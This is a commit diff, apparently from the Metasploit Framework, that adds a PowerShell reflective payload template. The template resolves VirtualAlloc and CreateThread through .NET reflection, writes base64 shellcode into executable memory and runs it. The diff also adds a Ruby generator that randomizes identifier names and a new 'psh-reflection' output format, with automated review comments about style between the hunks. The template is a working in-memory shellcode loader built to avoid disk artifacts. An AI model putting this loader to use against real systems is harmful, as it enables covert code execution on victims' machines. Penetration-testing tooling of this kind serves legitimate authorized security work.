Landing #2767, @Meatballs1 Powershell Reflective Payload
commit
3299b68adf
4
LICENSE
4
LICENSE
|
@ -15,6 +15,10 @@ License: BSD-3-clause
|
|||
# Last updated: 2013-Nov-04
|
||||
#
|
||||
|
||||
Files: data/templates/to_mem_pshreflection.ps1.template
|
||||
Copyright: 2012, Matthew Graeber
|
||||
License: BSD-3-clause
|
||||
|
||||
Files: data/john/*
|
||||
Copyright: 1996-2011 Solar Designer.
|
||||
License: GPL-2
|
||||
|
|
|
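--- /dev/null
+++ b/data/templates/to_mem_pshreflection.ps1.template
@@ -0,0 +1,27 @@
+function %{func_get_proc_address} {
+Param ($%{var_module}, $%{var_procedure})
+$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+
+return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+}
+
+function %{func_get_delegate_type} {
+Param (
+[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+)
+
+$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+
+return $%{var_type_builder}.CreateType()
+}
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null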
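Review bot: The new template has no header comment explaining its provenance or what the `%{...}` tokens are, even though the LICENSE hunk in this same commit attributes it to Matthew Graeber under BSD-3-clause; a leading line such as `# Derived from Matthew Graeber's PowerSploit reflection technique (BSD-3-clause, see LICENSE); %{...} tokens are substituted by Msf::Util::EXE.to_win32pe_psh_reflection` would let a reader of the file alone place it. The assembly filter in %{func_get_proc_address} uses `$_.Location.Split('\\')[-1]`, which looks like an escape sequence but is two literal backslashes inside single quotes; `[System.IO.Path]::GetFileName($_.Location) -eq 'System.dll'` expresses the same test without the puzzle. The rendered page shows no indentation inside either function body, so it is worth confirming the committed file keeps the indentation of the PowerSploit original.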
@ -782,7 +782,7 @@ require 'msf/core/exe/segment_injector'
|
|||
return read_replace_script_template("to_exe.vba.template", hash_sub)
|
||||
end
|
||||
|
||||
def self.to_vba(framework,code,opts={})
|
||||
def self.to_vba(framework,code,opts={})
|
||||
hash_sub = {}
|
||||
hash_sub[:var_myByte] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
|
||||
hash_sub[:var_myArray] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
|
||||
|
@ -920,6 +920,33 @@ def self.to_vba(framework,code,opts={})
|
|||
return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
||||
end
|
||||
|
||||
#
|
||||
# Reflection technique prevents the temporary .cs file being created for the .NET compiler
|
||||
# Tweaked by shellster
|
||||
# Originally from PowerSploit
|
||||
#
|
||||
def self.to_win32pe_psh_reflection(framework, code, opts={})
|
||||
# Intialize rig and value names
|
||||
rig = Rex::RandomIdentifierGenerator.new()
|
||||
rig.init_var(:func_get_proc_address)
|
||||
rig.init_var(:func_get_delegate_type)
|
||||
rig.init_var(:var_code)
|
||||
rig.init_var(:var_module)
|
||||
rig.init_var(:var_procedure)
|
||||
rig.init_var(:var_unsafe_native_methods)
|
||||
rig.init_var(:var_parameters)
|
||||
rig.init_var(:var_return_type)
|
||||
rig.init_var(:var_type_builder)
|
||||
rig.init_var(:var_buffer)
|
||||
rig.init_var(:var_hthread)
|
||||
|
||||
hash_sub = rig.to_h
|
||||
|
||||
hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
|
||||
|
||||
return read_replace_script_template("to_mem_pshreflection.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
||||
end
|
||||
|
||||
def self.to_win32pe_vbs(framework, code, opts={})
|
||||
to_exe_vbs(to_win32pe(framework, code, opts), opts)
|
||||
end
|
||||
|
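Review bot: The new `to_win32pe_psh_reflection` method documents its origin but not its contract, and the `framework` and `opts` parameters are accepted yet never read in the body, which a caller cannot see from the signature. Add a comment above the method, in the file's existing `#` style, stating that it returns the PowerShell reflection template with randomized identifier names and the base64-encoded `code` substituted in, with line endings normalized to CRLF, and that `framework` and `opts` are apparently kept only for signature parity with the sibling to_win32pe_* generators. The inline comment `# Intialize rig and value names` has a typo; `# Initialize rig and value names`.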
@ -1712,6 +1739,9 @@ def self.to_vba(framework,code,opts={})
|
|||
|
||||
when 'psh-net'
|
||||
output = Msf::Util::EXE.to_win32pe_psh_net(framework, code, exeopts)
|
||||
|
||||
when 'psh-reflection'
|
||||
output = Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts)
|
||||
|
||||
end
|
||||
|
||||
|
@ -1735,6 +1765,7 @@ def self.to_vba(framework,code,opts={})
|
|||
"msi-nouac",
|
||||
"psh",
|
||||
"psh-net",
|
||||
"psh-reflection",
|
||||
"vba",
|
||||
"vba-exe",
|
||||
"vbs",
|
||||
|
|